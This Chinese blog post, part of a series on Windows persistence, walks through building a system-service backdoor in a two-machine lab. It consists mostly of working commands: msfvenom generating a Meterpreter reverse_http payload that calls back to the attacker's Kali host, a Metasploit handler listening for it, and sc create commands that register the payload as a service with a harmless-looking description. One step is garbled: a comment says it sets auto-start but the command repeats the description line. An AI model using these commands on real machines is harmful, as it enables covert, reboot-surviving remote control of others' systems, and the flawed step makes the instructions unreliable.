操作系统权限维持(五)之Windows系统-系统服务维持后门

系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门

系统服务维持后门

系统服务

能够创建在操作系统自己的 Windows 会话中可长时间运行的可执行应用程序。这些服务可以在计算机启动时自动启动,可以暂停和重新启动而且不显示任何用户界面

创建服务:
sc命令

用法: sc  create [service name] [binPath= ]  ...

1、创建服务

sc create shell start= auto binPath= "C:\shell.exe" obj= Localsystem

2、查看服务是否已经创建

services.msc

3、修改正常的名称和描述

sc description "shell" "安全"

4、启动服务

net start "服务名"

系统服务后门

机器名IP
kali192.168.52.130
win10192.168.52.131

生成msf木马文件

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe

在这里插入图片描述
我们将我们的恶意文件上传到目标服务器上

kali机器开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

在这里插入图片描述
创建名字为test的自启动服务命令:

sc create "test" binpath= "C:\Users\Administart\Desktop\shell.exe"
sc description "test" "test"    #设置服务的描述字符串
sc description "test" "test"           #设置这个服务为自动启动
net start "test"                       #启动服务

在这里插入图片描述

kali机器收到监听会话

在这里插入图片描述

posted @   私ははいしゃ敗者です  阅读(26)  评论(0编辑  收藏  举报  
相关博文:
· 操作系统权限维持(四)之Windows系统-计划任务维持后门
· 操作系统权限维持(三)之Windows系统-启动项维持后门
· 14.Windows权限维持
· 服务权限维持
· windows权限维持整理
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
点击右上角即可分享
微信分享提示